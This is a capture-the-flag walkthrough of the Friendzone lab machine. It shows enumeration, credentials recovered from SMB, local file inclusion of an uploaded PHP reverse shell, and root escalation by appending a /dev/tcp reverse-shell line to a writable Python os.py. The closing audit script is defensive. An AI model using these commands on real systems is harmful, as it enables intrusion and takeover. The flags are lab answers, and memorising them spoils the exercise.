[Machines] [Easy] Friendzone LFI + Python os Library Pollution Privilege Escalation

Information Gathering

IP Address      Open Ports
10.10.10.123    TCP:21,22,53,80,139,443,445

$ nmap -p- 10.10.10.123 --min-rate 1000 -sC -sV

PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 3.0.3
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 a9:68:24:bc:97:1f:1e:54:a5:80:45:e7:4c:d9:aa:a0 (RSA)
|_  256 00:4e:1a:4f:33:e8:a0:de:86:a6:e4:2a:5f:84:61:2b (ED25519)
53/tcp  open  domain      ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)
| dns-nsid:
|_  bind.version: 9.11.3-1ubuntu1.2-Ubuntu
80/tcp  open  http        Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Friend Zone Escape software
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open  ssl/http    Apache httpd 2.4.29
| tls-alpn:
|_  http/1.1
| ssl-cert: Subject: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO
| Not valid before: 2018-10-05T21:02:30
|_Not valid after:  2018-11-04T21:02:30
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_ssl-date: TLS randomness does not represent time
|_http-title: 404 Not Found
445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)

SMB


$ enum4linux 10.10.10.123

$ dig axfr friendzone.red @10.10.10.123

$ smbclient //10.10.10.123/general

smb: \> get creds.txt

username:admin
password:WORKWORKHhallelujah@#

HTTPS

# echo '10.10.10.123 friendzone.red administrator1.friendzone.red hr.friendzone.red uploads.friendzone.red '>>/etc/hosts

https://friendzone.red/

$ gobuster dir -u "https://administrator1.friendzone.red" -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt -x txt,php -b 404,403 -t 50 -k

LFI

username:admin
password:WORKWORKHhallelujah@#

https://administrator1.friendzone.red/login.php

https://administrator1.friendzone.red/dashboard.php

$ smbclient //10.10.10.123/Development

smb: \> put php-reverse-shell.php
smb: \> put pspy32

https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=/etc/Development/php-reverse-shell

User.txt

ad2906258fb6679290609a6b243b6078

Privilege Escalation

$ cp /etc/Development/pspy32 /tmp

$ chmod +x /tmp/pspy32

$ /tmp/pspy32

$ cat /opt/server_admin/reporter.py

$ ls -la /usr/lib/python2.7/os.py

$ echo 'system("/bin/bash -c \"/bin/sh -i >& /dev/tcp/10.10.16.6/10033 0>&1\"")' >> /usr/lib/python2.7/os.py

Root.txt

253809a3fa48b78d59b7884199f37b35
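
The escalation above depends on a standard-library module (`/usr/lib/python2.7/os.py`) accepting an append from the low-privileged shell. The following is an added example, not part of the original writeup: a defender-side audit that walks Python library directories and reports module files that group or others can modify or replace. The function name `audit_python_paths` and the suffix list are my own assumptions.

```python
import os
import stat
import sys

LOOSE = stat.S_IWGRP | stat.S_IWOTH          # write bit for group or others
MODULE_SUFFIXES = (".py", ".pyc", ".so")     # file types the interpreter loads


def audit_python_paths(roots):
    """Return sorted (path, octal_mode, reason) for modules a non-owner can alter."""
    findings = []
    for root in roots:
        for dirpath, _dirnames, filenames in os.walk(root):
            try:
                dmode = os.stat(dirpath).st_mode
            except OSError:
                continue
            # A loose directory without the sticky bit lets others replace files in it.
            dir_open = bool(dmode & LOOSE) and not (dmode & stat.S_ISVTX)
            for name in filenames:
                if not name.endswith(MODULE_SUFFIXES):
                    continue
                path = os.path.join(dirpath, name)
                try:
                    fmode = os.stat(path).st_mode   # follows symlinks to the real file
                except OSError:
                    continue                         # dangling link or race: skip
                if fmode & LOOSE:
                    findings.append((path, oct(stat.S_IMODE(fmode)),
                                     "file writable by group/others"))
                elif dir_open:
                    findings.append((path, oct(stat.S_IMODE(dmode)),
                                     "parent directory writable by group/others"))
    return sorted(findings)


if __name__ == "__main__":
    # Assumption: audit the directories this interpreter imports from.
    roots = [p for p in sys.path if p and os.path.isdir(p)]
    for path, mode, reason in audit_python_paths(roots):
        print("%s  %s  %s" % (mode, path, reason))
```

Run it with each interpreter that privileged jobs use, since every interpreter has its own `sys.path`; any finding under a system library directory should be corrected to root-owned, mode 644.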
